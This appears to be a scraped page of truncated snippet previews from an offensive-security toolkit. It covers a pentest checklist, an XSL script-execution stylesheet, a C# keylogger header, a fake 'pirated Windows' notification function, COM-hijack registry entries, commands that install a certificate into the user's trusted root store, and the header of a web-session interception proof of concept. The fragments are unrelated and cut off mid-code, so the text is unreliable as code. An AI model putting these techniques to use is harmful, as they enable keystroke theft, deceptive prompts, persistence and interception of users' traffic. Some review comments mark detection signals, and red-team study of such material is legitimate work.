- Recon
- Find vuln
- Exploit
- Document it
Run Unicornscan from the CLI; run nmap inside msfconsole so that results (loot) are stored in the database.
| <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
| <!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
| <xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
| <xsl:strip-space elements="*" /> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
| function Invoke-Wlrmdr { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory = $True, Position = 0)] | |
| [String] $Message = "You are using pirated Windows", | |
| [Parameter(Mandatory = $True, Position = 1)] | |
| [String] $IconType = 'Key', | |
| [Parameter(Mandatory = $True, Position = 2)] | |
| [String] $Title = 'Windows Explorer' |
| Windows Registry Editor Version 5.00 | |
| ; Per-user (HKCU) COM class registration: two ProgIDs are mapped to the same CLSID. | |
| ; NOTE(review): ProgID/CLSID entries appearing under HKCU\SOFTWARE\Classes are a useful registry-monitoring signal. | |
| ; Versioned ProgID and its default (display) value. | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| ; CLSID that the versioned ProgID resolves to. | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| ; Version-independent ProgID with the same default value. | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| ; The version-independent ProgID resolves to the same CLSID as above. | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
| ############################################################################################################# | |
| # PowerSlim 0.1 | |
| ############################################################################################################# | |
| import os,re | |
| import clr,os | |
| clr.AddReference("System.Management") | |
| clr.AddReference("System.Management.Automation") | |
| from System.Management.Automation import * | |
| from System.Management.Automation.Host import * | |
| from System.Management.Automation.Runspaces import * |
| # Check that no certificate whose subject matches "__Interceptor_Trusted_Root" is already in the current user's Root store (no output expected). | |
| ( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" }) | |
| # Import C:\Test\thing.cer into the current user's Root (trusted root) store. | |
| # NOTE(review): unexpected additions to Cert:\CurrentUser\Root are worth alerting on, since a root placed there is trusted for that user. | |
| ( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root | |
| # Original note: "Prompted" - presumably Windows shows a confirmation dialog at this point; confirm which command it refers to. | |
| # Remove the certificate with this thumbprint from the current user's Root store. | |
| Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99 |
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |